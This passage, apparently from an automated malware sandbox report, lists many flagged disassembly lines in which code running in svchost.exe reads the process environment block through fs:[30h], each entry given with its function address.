            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h] | 1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h] | 1_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0330634F mov eax, dword ptr fs:[00000030h] | 1_2_0330634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h] | 1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h] | 1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h] | 1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325438F mov eax, dword ptr fs:[00000030h] | 1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0325438F mov eax, dword ptr fs:[00000030h] | 1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h] | 1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h] | 1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03228397 mov eax, dword ptr fs:[00000030h] | 1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] | 1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] | 1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] | 1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] | 1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] | 1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] | 1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] | 1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h] | 1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h] | 1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032663FF mov eax, dword ptr fs:[00000030h] | 1_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h] | 1_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h] | 1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h] | 1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h] | 1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h] | 1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h] | 1_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h] | 1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h] | 1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h] | 1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h] | 1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322823B mov eax, dword ptr fs:[00000030h] | 1_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h] | 1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h] | 1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03234260 mov eax, dword ptr fs:[00000030h] | 1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322826B mov eax, dword ptr fs:[00000030h] | 1_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h] | 1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h] | 1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h] | 1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0330625D mov eax, dword ptr fs:[00000030h] | 1_2_0330625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h] | 1_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03236259 mov eax, dword ptr fs:[00000030h] | 1_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h] | 1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h] | 1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h] | 1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h] | 1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h] | 1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h] | 1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h] | 1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h] | 1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h] | 1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h] | 1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h] | 1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h] | 1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h] | 1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032402E1 mov eax, dword ptr fs:[00000030h] | 1_2_032402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A2C3 mov eax, dword ptr fs:[00000030h] | 1_2_0323A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033062D6 mov eax, dword ptr fs:[00000030h] | 1_2_033062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03260124 mov eax, dword ptr fs:[00000030h] | 1_2_03260124
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov eax, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DE10E mov ecx, dword ptr fs:[00000030h] | 1_2_032DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA118 mov ecx, dword ptr fs:[00000030h] | 1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h] | 1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h] | 1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032DA118 mov eax, dword ptr fs:[00000030h] | 1_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F0115 mov eax, dword ptr fs:[00000030h] | 1_2_032F0115
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03304164 mov eax, dword ptr fs:[00000030h] | 1_2_03304164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03304164 mov eax, dword ptr fs:[00000030h] | 1_2_03304164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h] | 1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h] | 1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C4144 mov ecx, dword ptr fs:[00000030h] | 1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h] | 1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C4144 mov eax, dword ptr fs:[00000030h] | 1_2_032C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322C156 mov eax, dword ptr fs:[00000030h] | 1_2_0322C156
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C8158 mov eax, dword ptr fs:[00000030h] | 1_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h] | 1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03236154 mov eax, dword ptr fs:[00000030h] | 1_2_03236154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03270185 mov eax, dword ptr fs:[00000030h] | 1_2_03270185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h] | 1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032EC188 mov eax, dword ptr fs:[00000030h] | 1_2_032EC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h] | 1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D4180 mov eax, dword ptr fs:[00000030h] | 1_2_032D4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h] | 1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h] | 1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h] | 1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B019F mov eax, dword ptr fs:[00000030h] | 1_2_032B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h] | 1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h] | 1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322A197 mov eax, dword ptr fs:[00000030h] | 1_2_0322A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_033061E5 mov eax, dword ptr fs:[00000030h] | 1_2_033061E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032601F8 mov eax, dword ptr fs:[00000030h] | 1_2_032601F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h] | 1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032F61C3 mov eax, dword ptr fs:[00000030h] | 1_2_032F61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE1D0 mov ecx, dword ptr fs:[00000030h] | 1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE1D0 mov eax, dword ptr fs:[00000030h] | 1_2_032AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322A020 mov eax, dword ptr fs:[00000030h] | 1_2_0322A020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0322C020 mov eax, dword ptr fs:[00000030h] | 1_2_0322C020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C6030 mov eax, dword ptr fs:[00000030h] | 1_2_032C6030
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B4000 mov ecx, dword ptr fs:[00000030h] | 1_2_032B4000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D2000 mov eax, dword ptr fs:[00000030h] | 1_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h] | 1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h] | 1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E016 mov eax, dword ptr fs:[00000030h]1_2_0324E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C073 mov eax, dword ptr fs:[00000030h]1_2_0325C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232050 mov eax, dword ptr fs:[00000030h]1_2_03232050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]1_2_032B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032280A0 mov eax, dword ptr fs:[00000030h]1_2_032280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]1_2_032C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]1_2_032F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]1_2_0323208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0322A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]1_2_032380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]1_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]1_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]1_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]1_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]1_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]1_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]1_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]1_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]1_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]1_2_03260710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]1_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]1_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]1_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]1_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]1_2_032BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]1_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]1_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]1_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]1_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]1_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]1_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]1_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]1_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]1_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]1_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]1_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]1_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]1_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]1_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]1_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]1_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]1_2_03272619
